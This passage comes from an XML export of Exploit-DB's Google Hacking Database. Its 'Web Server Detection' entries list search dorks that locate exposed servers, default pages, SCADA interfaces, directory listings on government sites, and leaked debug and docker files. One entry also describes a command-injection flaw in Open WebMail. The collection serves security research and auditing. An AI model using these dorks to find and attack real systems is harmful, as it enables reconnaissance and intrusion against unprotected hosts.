<querystring>https://www.google.com/search?q=intitle:&quot;Current Network Status&quot; &quot;Nagios&quot;</querystring>
<edb></edb>
<date>2021-05-03</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>557</id>
<link>https://www.exploit-db.com/ghdb/557</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Directory Listing, Index of /*/&quot;</shortDescription>
<textualDescription>Vendor page:&quot;Einfache HTTP-Server-Software fÃÆür privates Homepage-Hosting oder groÃÆŸe Uploads.&quot;small HTTP server software for private hompage hosting or big uploads.</textualDescription>
<query>intitle:&quot;Directory Listing, Index of /*/&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22Directory+Listing,+Index+of+/*/%22&amp;filter=0</querystring>
<edb></edb>
<date>2004-10-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>967</id>
<link>https://www.exploit-db.com/ghdb/967</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Document title goes here&quot; intitle:&quot;used by web search tools&quot; &quot; example of a simple Home Page&quot;</shortDescription>
<textualDescription>IBM Http Server (AS/400)</textualDescription>
<query>intitle:&quot;Document title goes here&quot; intitle:&quot;used by web search tools&quot; &quot; example of a simple Home Page&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22Document+title+goes+here%22+intitle:%22used+by+web+search+tools%22+%22+example+of+a+simple+Home+Page%22&amp;c2coff=1&amp;filter=0</querystring>
<edb></edb>
<date>2005-05-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>7241</id>
<link>https://www.exploit-db.com/ghdb/7241</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Domain Default page&quot; &quot;Parallels IP Holdings GmbH&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Domain Default page&quot; &quot;Parallels IP Holdings GmbH&quot;
# Web Server Detection
# Date: 23/06/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;Domain Default page&quot; &quot;Parallels IP Holdings GmbH&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Domain Default page&quot; &quot;Parallels IP Holdings GmbH&quot;</querystring>
<edb></edb>
<date>2021-09-16</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>558</id>
<link>https://www.exploit-db.com/ghdb/558</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;error 404&quot; &quot;From RFC 2068 &quot;</shortDescription>
<textualDescription>WebLogic Server Process Edition extends the functionality of the Application Server by converging custom app development with powerful Business Process Management (BPM) capabilities to provide an industrial strength, standards-based framework that enables the rapidly assembly of composite services, transforming existing infrastructure to a service oriented architecture-in a manageable phased approach.</textualDescription>
<query>intitle:&quot;error 404&quot; &quot;From RFC 2068 &quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22error+404%22+%22From+RFC+2068+%22</querystring>
<edb></edb>
<date>2004-10-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>6876</id>
<link>https://www.exploit-db.com/ghdb/6876</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;GlassFish Server - Server Running&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;GlassFish Server - Server Running&quot;
# Web Server Detection
# Date: 19/04/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;GlassFish Server - Server Running&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;GlassFish Server - Server Running&quot;</querystring>
<edb></edb>
<date>2021-04-19</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>4351</id>
<link>https://www.exploit-db.com/ghdb/4351</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;HFS&quot; &quot;Server Uptime&quot; &quot;Server time&quot;</shortDescription>
<textualDescription>HttpFileServer with open access
Category: Web Server Detection
@theevilbit - Csaba Fitzl</textualDescription>
<query>intitle:&quot;HFS&quot; &quot;Server Uptime&quot; &quot;Server time&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;HFS&quot; &quot;Server Uptime&quot; &quot;Server time&quot;</querystring>
<edb></edb>
<date>2016-11-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>6990</id>
<link>https://www.exploit-db.com/ghdb/6990</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Icecast Streaming Media Server&quot;</shortDescription>
<textualDescription># Dork: intitle:&quot;Icecast Streaming Media Server&quot;</textualDescription>
<query>intitle:&quot;Icecast Streaming Media Server&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Icecast Streaming Media Server&quot;</querystring>
<edb></edb>
<date>2021-06-07</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>5310</id>
<link>https://www.exploit-db.com/ghdb/5310</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;IIS Windows Server&quot; -inurl:&quot;IIS Windows Server&quot;</shortDescription>
<textualDescription>web server detection:
intitle:&quot;IIS Windows Server&quot; -inurl:&quot;IIS Windows Server&quot;
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;IIS Windows Server&quot; -inurl:&quot;IIS Windows Server&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;IIS Windows Server&quot; -inurl:&quot;IIS Windows Server&quot;</querystring>
<edb></edb>
<date>2019-07-31</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>4540</id>
<link>https://www.exploit-db.com/ghdb/4540</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Index of /&quot; &quot;Proudly Served by Surftown at&quot;</shortDescription>
<textualDescription>Finds Surftown HTTP servers
Dxtroyer</textualDescription>
<query>intitle:&quot;Index of /&quot; &quot;Proudly Served by Surftown at&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of /&quot; &quot;Proudly Served by Surftown at&quot;</querystring>
<edb></edb>
<date>2017-06-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>7251</id>
<link>https://www.exploit-db.com/ghdb/7251</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/homedir/etc/&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;/homedir/etc/&quot;
# Web Server Detection
# Date: 14/08/2021
# Exploit Author: Chahine Boutighane </textualDescription>
<query>intitle:&quot;index of&quot; &quot;/homedir/etc/&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/homedir/etc/&quot;</querystring>
<edb></edb>
<date>2021-09-17</date>
<author>Chahine Boutighane</author>
</entry>
<entry>
<id>4543</id>
<link>https://www.exploit-db.com/ghdb/4543</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Index of&quot; &quot;Apache/2.4.7 (Ubuntu) Server&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;Index of&quot; &quot;Apache/2.4.7 (Ubuntu) Server&quot;
Desc: This dork is used to find Ubuntu servers and a certain version of
Apache. Modify it to find the servers you need.</textualDescription>
<query>intitle:&quot;Index of&quot; &quot;Apache/2.4.7 (Ubuntu) Server&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; &quot;Apache/2.4.7 (Ubuntu) Server&quot;</querystring>
<edb></edb>
<date>2017-06-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>5941</id>
<link>https://www.exploit-db.com/ghdb/5941</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;index of&quot; &quot;debug.log&quot; OR &quot;debug-log&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;debug.log&quot; OR &quot;debug-log&quot;
# Sensitive directories.
# Date: 22/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;debug.log&quot; OR &quot;debug-log&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;debug.log&quot; OR &quot;debug-log&quot;</querystring>
<edb></edb>
<date>2020-04-22</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6000</id>
<link>https://www.exploit-db.com/ghdb/6000</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;index of&quot; &quot;docker.yml&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;docker.yml&quot;
Description: This Google dork lists out docker configuration details stored
in a file named &quot;docker.yml&quot; for a drupal cms website.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;docker.yml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;docker.yml&quot;</querystring>
<edb></edb>
<date>2020-05-04</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>5790</id>
<link>https://www.exploit-db.com/ghdb/5790</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;index of&quot; &quot;powered by apache &quot; &quot;port 80&quot;</shortDescription>
<textualDescription>Google Dork Query to find out insecure Apache Servers running on Port 80.
Google Dork Query: *intitle:&quot;index of&quot; &quot;powered by apache &quot; &quot;port 80&quot;*
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;powered by apache &quot; &quot;port 80&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;powered by apache &quot; &quot;port 80&quot;</querystring>
<edb></edb>
<date>2020-03-16</date>
<author>Rohit Gautam</author>
</entry>
<entry>
<id>5715</id>
<link>https://www.exploit-db.com/ghdb/5715</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;index of&quot; &quot;Served by Sun-ONE&quot;</shortDescription>
<textualDescription>Sun-ONE web servers
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;Served by Sun-ONE&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;Served by Sun-ONE&quot;</querystring>
<edb></edb>
<date>2020-01-28</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>5701</id>
<link>https://www.exploit-db.com/ghdb/5701</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;index of&quot; &quot;server at&quot;</shortDescription>
<textualDescription>Another way to spot Apache web servers in case the service name is hidden.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;server at&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;server at&quot;</querystring>
<edb></edb>
<date>2020-01-23</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>7252</id>
<link>https://www.exploit-db.com/ghdb/7252</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;index of&quot; AND inurl:magento AND inurl:/dev</shortDescription>
<textualDescription># Google Dork: intitle:&quot;R WebServer&quot;
# Web Server Detection
# Date: 16/08/2021
# Exploit Author: Brahmaraj Rathod</textualDescription>
<query>intitle:&quot;index of&quot; AND inurl:magento AND inurl:/dev</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; AND inurl:magento AND inurl:/dev</querystring>
<edb></edb>
<date>2021-09-17</date>
<author>Brahmaraj Rathod</author>
</entry>
<entry>
<id>7034</id>
<link>https://www.exploit-db.com/ghdb/7034</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Index of&quot; site:.gov intext:&quot;Server at&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of&quot; site:.gov intext:”Server at”
# Web Server Detection
# Date: 21/07/2021
# Exploit Author: Aftab Alam
Description: This Dork shows all “Index of” pages with server information of government web servers that have “.gov” in their URLs.</textualDescription>
<query>intitle:&quot;Index of&quot; site:.gov intext:&quot;Server at&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; site:.gov intext:&quot;Server at&quot;</querystring>
<edb></edb>
<date>2021-07-22</date>
<author>Aftab Alam</author>
</entry>
<entry>
<id>7286</id>
<link>https://www.exploit-db.com/ghdb/7286</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;index of&quot; site:.gov.in</shortDescription>
<textualDescription> # Google Dork: intitle:&quot;index of&quot; site:.gov.in
# Web Server Detection
# Date: 21/09/2021
# Exploit Author: Deven Rathod</textualDescription>
<query>intitle:&quot;index of&quot; site:.gov.in</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; site:.gov.in</querystring>
<edb></edb>
<date>2021-09-23</date>
<author>Deven Rathod</author>
</entry>
<entry>
<id>922</id>
<link>https://www.exploit-db.com/ghdb/922</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;IPC@CHIP Infopage&quot;</shortDescription>
<textualDescription>web server detection for IPC@chip embedded webserverThe dork uses the webserver's infopage which reveals some very interesting information.See securityfocus advisory for more info: http://www.securityfocus.com/bid/2767</textualDescription>
<query>intitle:&quot;IPC@CHIP Infopage&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=intitle%3A%22IPC%40CHIP+Infopage%22+</querystring>
<edb></edb>
<date>2005-03-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>6539</id>
<link>https://www.exploit-db.com/ghdb/6539</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Lists Web Service&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Lists Web Service&quot;
# Exposed SharePoint (Lists Web Service).
# Date: 15/09/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Lists Web Service&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Lists Web Service&quot;</querystring>
<edb></edb>
<date>2020-09-15</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>556</id>
<link>https://www.exploit-db.com/ghdb/556</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Lotus Domino Go Webserver:&quot; &quot;Tuning your webserver&quot; -site:ibm.com</shortDescription>
<textualDescription>Domino Go Webserver is a scalable high-performance Web server that runs on a broad range of platforms. Domino Go Webserver brings you state-of-the-art security, site indexing capabilities, and advanced server statistics reporting. With Domino Go Webserver, you can speed beyond your competition by exploiting the latest advances in technology, such as Java, HTTP 1.1, and Web site content rating. Get all this and more in a Web server that's easy to install and maintain. --From the Lotus Domino Go Webserver web pag</textualDescription>
<query>intitle:&quot;Lotus Domino Go Webserver:&quot; &quot;Tuning your webserver&quot; -site:ibm.com</query>
<querystring>https://www.google.com/search?q=intitle:%22Lotus+Domino+Go+Webserver:%22+%22Tuning+your+webserver%22+-site:ibm.com&amp;filter=0</querystring>
<edb></edb>
<date>2004-10-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>6461</id>
<link>https://www.exploit-db.com/ghdb/6461</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Microsoft Internet Information Services 8&quot; -IIS</shortDescription>
<textualDescription>Google Dork: intitle:&quot;Microsoft Internet Information Services 8&quot; -IIS
Description: This dork detects all IIS version 8 servers in search engine.
Author: Sibi Mathew George
</textualDescription>
<query>intitle:&quot;Microsoft Internet Information Services 8&quot; -IIS</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Microsoft Internet Information Services 8&quot; -IIS</querystring>
<edb></edb>
<date>2020-08-04</date>
<author>Sibi Mathew George</author>
</entry>
<entry>
<id>4749</id>
<link>https://www.exploit-db.com/ghdb/4749</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;miniProxy&quot;</shortDescription>
<textualDescription>This dork finds this little script: (https://github.com/joshdick/miniProxy).
This will provide free proxies to use for browsing or, as it is usable with
GET parameters, to use with cURL.
Use ethically and responsibly.
Dork by _palonE
</textualDescription>
<query>intitle:&quot;miniProxy&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;miniProxy&quot;</querystring>
<edb></edb>
<date>2018-04-06</date>
<author>_palonE</author>
</entry>
<entry>
<id>6902</id>
<link>https://www.exploit-db.com/ghdb/6902</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Miniweb Start Page&quot; | &quot;/CSS/Miniweb.css&quot;</shortDescription>
<textualDescription># Dork: intitle:&quot;Miniweb Start Page&quot; | &quot;/CSS/Miniweb.css&quot;
Category: Scada Servers (Product: ControlLogix ,CompactLogix) Allen-Bradle
Rockwell Automation
Author: Brijesh Joshi
</textualDescription>
<query>intitle:&quot;Miniweb Start Page&quot; | &quot;/CSS/Miniweb.css&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Miniweb Start Page&quot; | &quot;/CSS/Miniweb.css&quot;</querystring>
<edb></edb>
<date>2021-04-30</date>
<author>Brijesh Joshi</author>
</entry>
<entry>
<id>6509</id>
<link>https://www.exploit-db.com/ghdb/6509</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Monsta ftp&quot; intext:&quot;Lock session to IP&quot;</shortDescription>
<textualDescription># Author:Edwyn Sanders
# Date: 23-08-2020
# Dork: intitle:&quot;Monsta ftp&quot; intext:&quot;Lock session to IP&quot;
# Description: shows the websites that use the ftp service of the Monsta Ftp company
Mgter Edwyn Roberto Sanders Rivera
Catedrático
Universidad Tecnológica de Honduras , UTH
</textualDescription>
<query>intitle:&quot;Monsta ftp&quot; intext:&quot;Lock session to IP&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Monsta ftp&quot; intext:&quot;Lock session to IP&quot;</querystring>
<edb></edb>
<date>2020-08-31</date>
<author>Edwyn Sanders</author>
</entry>
<entry>
<id>7238</id>
<link>https://www.exploit-db.com/ghdb/7238</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;nPerfServer&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;nPerfServer&quot;
# Web Server Detection
# Date: 07/07/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>intitle:&quot;nPerfServer&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;nPerfServer&quot;</querystring>
<edb></edb>
<date>2021-09-16</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>563</id>
<link>https://www.exploit-db.com/ghdb/563</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Object not found!&quot; intext:&quot;Apache/2.0.* (Linux/SuSE)&quot;</shortDescription>
<textualDescription>This one detects apache werbservers (2.0.X/SuSE) with its error page.</textualDescription>
<query>intitle:&quot;Object not found!&quot; intext:&quot;Apache/2.0.* (Linux/SuSE)&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Object+not+found%21%22+intext%3A%22Apache%2F2.0.*+%28Linux%2FSuSE%29%22&amp;btnG=B%FAsqueda</querystring>
<edb></edb>
<date>2004-10-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>538</id>
<link>https://www.exploit-db.com/ghdb/538</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Object not found&quot; netware &quot;apache 1..&quot;</shortDescription>
<textualDescription>This search will show netware apache webservers as the result.</textualDescription>
<query>intitle:&quot;Object not found&quot; netware &quot;apache 1..&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22Object+not+found%22+netware+%22apache+1..%22&amp;filter=0</querystring>
<edb></edb>
<date>2004-10-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>559</id>
<link>https://www.exploit-db.com/ghdb/559</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Open WebMail&quot; &quot;Open WebMail version (2.20|2.21|2.30) &quot;</shortDescription>
<textualDescription>&quot;Open WebMail is a webmail system based on the Neomail version 1.14 from Ernie Miller. Open WebMail is designed to manage very large mail folder files in a memory efficient way. It also provides a range of features to help users migrate smoothly from Microsoft Outlook to Open WebMail&quot;. A remote attacker can run arbitrary commands with the web server's privileges by exploiting an unfiltered parameter in userstat.pl. Details Vulnerable Systems: * Open Webmail versions 2.20, 2.21 and 2.30 * Limited exploitation on openwebmail-current.tgz that was released on 2004-04-30 (See below) The vulnerability was discovered in an obsolete script named userstat.pl shipped with Open Webmail. The script doesn't properly filter out shell characters from the loginname parameter. The loginname parameter is used as an argument when executing openwebmail-tool.pl from the vulnerable script. By adding a &quot;;&quot;, &quot;|&quot; or &quot;( )&quot; followed by the shell command to a http GET, HEAD or POST request an attacker can execute arbitrary system commands as an unprivileged user (the Apache user, &quot;nobody&quot; or &quot;www&quot;, e.g.).</textualDescription>
<query>intitle:&quot;Open WebMail&quot; &quot;Open WebMail version (2.20|2.21|2.30) &quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Open+WebMail%22+%22Open+WebMail+version+%282.20%7C2.21%7C2.30%29+%22&amp;btnG=B%C3%BAsqueda</querystring>
<edb></edb>
<date>2004-10-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>732</id>
<link>https://www.exploit-db.com/ghdb/732</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Resin Default Home Page&quot;</shortDescription>
<textualDescription>Resin provides a fast standalone web server. This search locates those servers based on the title of the default page.</textualDescription>
<query>intitle:&quot;Resin Default Home Page&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Resin+Default+Home+Page%22</querystring>
<edb></edb>
<date>2004-11-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>6949</id>
<link>https://www.exploit-db.com/ghdb/6949</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Server Backup Manager SE&quot;</shortDescription>
<textualDescription>intitle:&quot;Server Backup Manager SE&quot;</textualDescription>
<query>intitle:&quot;Server Backup Manager SE&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Server Backup Manager SE&quot;</querystring>
<edb></edb>
<date>2021-05-21</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>390</id>
<link>https://www.exploit-db.com/ghdb/390</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Shoutcast Administrator&quot;</shortDescription>
<textualDescription>shoutcast is software for streaming mp3 and such. This search finds the administrator page. It can be used to detect unlisted Shoutcast servers.</textualDescription>
<query>intitle:&quot;Shoutcast Administrator&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Shoutcast+Administrator%22</querystring>
<edb></edb>
<date>2004-07-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>7301</id>
<link>https://www.exploit-db.com/ghdb/7301</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Shoutcast server&quot; inurl:&quot;/index.html&quot; &quot;SHOUTcast Server&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Shoutcast server&quot; inurl:&quot;/index.html&quot; &quot;SHOUTcast Server&quot;
# Web Server Detection
# Date: 04/09/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;Shoutcast server&quot; inurl:&quot;/index.html&quot; &quot;SHOUTcast Server&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Shoutcast server&quot; inurl:&quot;/index.html&quot; &quot;SHOUTcast Server&quot;</querystring>
<edb></edb>
<date>2021-09-27</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>6948</id>
<link>https://www.exploit-db.com/ghdb/6948</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;SOGo&quot; site:webmail.*</shortDescription>
<textualDescription>intitle:&quot;SOGo&quot; site:webmail.*</textualDescription>
<query>intitle:&quot;SOGo&quot; site:webmail.*</query>
<querystring>https://www.google.com/search?q=intitle:&quot;SOGo&quot; site:webmail.*</querystring>
<edb></edb>
<date>2021-05-21</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>7229</id>
<link>https://www.exploit-db.com/ghdb/7229</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;STEP by STIBO Systems&quot; &quot;Launch STEPworkbench&quot; &quot;Web UI Component Report&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;STEP by STIBO Systems&quot; &quot;Launch STEPworkbench&quot; &quot;Web UI Component Report&quot;
# Web Server Detection
# Date: 15/09/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;STEP by STIBO Systems&quot; &quot;Launch STEPworkbench&quot; &quot;Web UI Component Report&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;STEP by STIBO Systems&quot; &quot;Launch STEPworkbench&quot; &quot;Web UI Component Report&quot;</querystring>
<edb></edb>
<date>2021-09-15</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>7291</id>
<link>https://www.exploit-db.com/ghdb/7291</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Success!&quot; intext:&quot;Your new web server is ready to use.&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Success!&quot; intext:&quot;Your new web server is ready to use.&quot;
# Web Server Detection
# Date:01/09/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>intitle:&quot;Success!&quot; intext:&quot;Your new web server is ready to use.&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Success!&quot; intext:&quot;Your new web server is ready to use.&quot;</querystring>
<edb></edb>
<date>2021-09-23</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>5005</id>
<link>https://www.exploit-db.com/ghdb/5005</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Sucuri WebSite Firewall - Access Denied&quot;</shortDescription>
<textualDescription>intitle:&quot;Sucuri WebSite Firewall - Access Denied&quot;
Sucuri Firewall detected
ManhNho
</textualDescription>
<query>intitle:&quot;Sucuri WebSite Firewall - Access Denied&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Sucuri WebSite Firewall - Access Denied&quot;</querystring>
<edb></edb>
<date>2018-11-01</date>
<author>ManhNho</author>
</entry>
<entry>
<id>171</id>
<link>https://www.exploit-db.com/ghdb/171</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Test Page for Apache&quot;</shortDescription>
<textualDescription>This is the default web page for Apache 1.2.6 - 1.3.9. Hackers can use this information to determine the version of the web server, or to search Google for vulnerable targets. In addition, this indicates that the web server is not well maintained.</textualDescription>
<query>intitle:&quot;Test Page for Apache&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Test+Page+for+Apache+Installation%22</querystring>
<edb></edb>
<date>2004-04-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>108</id>
<link>https://www.exploit-db.com/ghdb/108</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Test Page for Apache&quot; &quot;It Worked!&quot;</shortDescription>
<textualDescription>This is the default web page for Apache 1.2.6 - 1.3.9. Hackers can use this information to determine the version of the web server, or to search Google for vulnerable targets. In addition, this indicates that the web server is not well maintained.</textualDescription>
<query>intitle:&quot;Test Page for Apache&quot; &quot;It Worked!&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Test+Page+for+Apache%22+%22It+Worked%21%22</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>109</id>
<link>https://www.exploit-db.com/ghdb/109</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Test Page for Apache&quot; &quot;It Worked!&quot; &quot;on this web&quot;</shortDescription>
<textualDescription>This is the default web page for Apache 1.2.6 - 1.3.9. Hackers can use this information to determine the version of the web server, or to search Google for vulnerable targets. In addition, this indicates that the web server is not well maintained.</textualDescription>
<query>intitle:&quot;Test Page for Apache&quot; &quot;It Worked!&quot; &quot;on this web&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Test+Page+for+Apache%22+%22It+Worked%21%22+%22on+this+web%22</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>912</id>
<link>https://www.exploit-db.com/ghdb/912</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Test Page for the Apache HTTP Server on Fedora Core&quot; intext:&quot;Fedora Core Test Page&quot;</shortDescription>
<textualDescription>Apache 2.0 on Fedore Core Test page</textualDescription>
<query>intitle:&quot;Test Page for the Apache HTTP Server on Fedora Core&quot; intext:&quot;Fedora Core Test Page&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22Test+Page+for+the+Apache+HTTP+Server+on+Fedora+Core%22+intext:%22Fedora+Core+Test+Page%22&amp;filter=0</querystring>
<edb></edb>
<date>2005-03-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>6956</id>
<link>https://www.exploit-db.com/ghdb/6956</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;Test Page for the HTTP Server on Fedora&quot;</shortDescription>
<textualDescription>#Dork: intitle:&quot;Test Page for the HTTP Server on Fedora&quot;</textualDescription>
<query>intitle:&quot;Test Page for the HTTP Server on Fedora&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Test Page for the HTTP Server on Fedora&quot;</querystring>
<edb></edb>
<date>2021-05-25</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>5226</id>
<link>https://www.exploit-db.com/ghdb/5226</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;WAMPSERVER homepage&quot; &quot;Server Configuration&quot; &quot;Apache Version&quot;</shortDescription>
<textualDescription>Dork for instances of WAMPSERVER homepages.
Dork by Rootkit Pentester.
</textualDescription>
<query>intitle:&quot;WAMPSERVER homepage&quot; &quot;Server Configuration&quot; &quot;Apache Version&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;WAMPSERVER homepage&quot; &quot;Server Configuration&quot; &quot;Apache Version&quot;</querystring>
<edb></edb>
<date>2019-05-29</date>
<author>Rootkit_Pentester</author>
</entry>
<entry>
<id>7289</id>
<link>https://www.exploit-db.com/ghdb/7289</link>
<category>Web Server Detection</category>
<shortDescription>intitle:&quot;WATASHI SERVICE&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;WATASHI SERVICE&quot;
# Web Server Detetion
# Date: 17/09/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>intitle:&quot;WATASHI SERVICE&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;WATASHI SERVICE&quot;</querystring>
<edb></edb>
